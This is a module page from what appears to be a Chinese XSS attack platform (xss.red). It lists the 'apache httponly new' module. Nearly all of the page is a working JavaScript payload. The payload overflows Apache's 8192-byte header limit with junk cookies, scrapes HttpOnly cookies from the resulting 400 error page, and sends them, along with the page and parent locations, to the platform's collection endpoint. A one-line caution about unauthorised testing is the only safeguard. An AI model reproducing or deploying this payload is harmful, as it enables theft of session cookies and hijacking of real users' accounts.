存档
那些文章
漏洞预警
圈内新闻
资源分享
设计笔记
吐槽
笔记
关于
留言
友链
计划
读者墙
标签集
面板
更新历史
提交需求
Chatgpt
XSS平台
子站搜索
会员面板
请经常阅读公告和更新日志来快速了解面板的发展情况.
未登录
未激活
面板公告
更新历史
提交需求
需求列表
Chatgpt
XSS 平台
我的模块
公共模块
辅助扩展
短号选择
子站搜索
面板密语
个人设置
消费清单
退出登录
测试之前,请妥善考虑一二,请勿胡乱搞事情,测试未授权网站有风险!
模块名称
apache httponly new
模块描述
apache httponly bypass 利用apache server head limit 8192字节限制, 从400状态页爆出httponly保护的cookie. xsser.me平台httponly模块的一点修改 http://bbs.blackbap.org/thread-4724-1-1.html
参数
需要服务器接收的参数名
没有配置该参数!
配置参数
使用此模块时需要配置的参数,如参数名为user,则代码引用:{set.user}
没有配置该参数!
代码
{projectId}为项目id,{set.***}为***配置参数
function setCookies (good) { /*apache server limit 8192*/ var str = ""; for (var i=0; i< 819; i++) { str += "x"; } for (i = 0; i < 10; i++) { if (good){ var cookie = "ray"+i+"=expires="+new Date(+new Date()-1).toUTCString()+";path=/;"; }else{ var cookie = "ray"+i+"="+str+";path=/"; } document.cookie = cookie; } } function parseCookies () { if (xhr.readyState === 4 && xhr.status === 400) { var cookie_dit = {}; var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/); content = content[1].replace("Cookie: ", ""); cookies = content.replace(/ray\d=x+;?/g, '') cookie_dit = cookies; try { var myopener=''; myopener = window.parent.openner.location; var myparent = ''; myparent = window.parent.location; } catch(err){ myopener='0';myparent ='0'; } setCookies(true); new Image().src = 'https://xss.red/index.php?do=api&id={projectId}&location='+escape(document.location)+'&toplocation='+escape(myparent)+'&cookie='+escape(cookie_dit)+'&opener='+escape(myopener); } } setCookies(); var xhr = window.XMLHttpRequest? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest(); xhr.onreadystatechange = parseCookies; xhr.open("POST", "/?"+Math.random(), true); xhr.send(null);
返回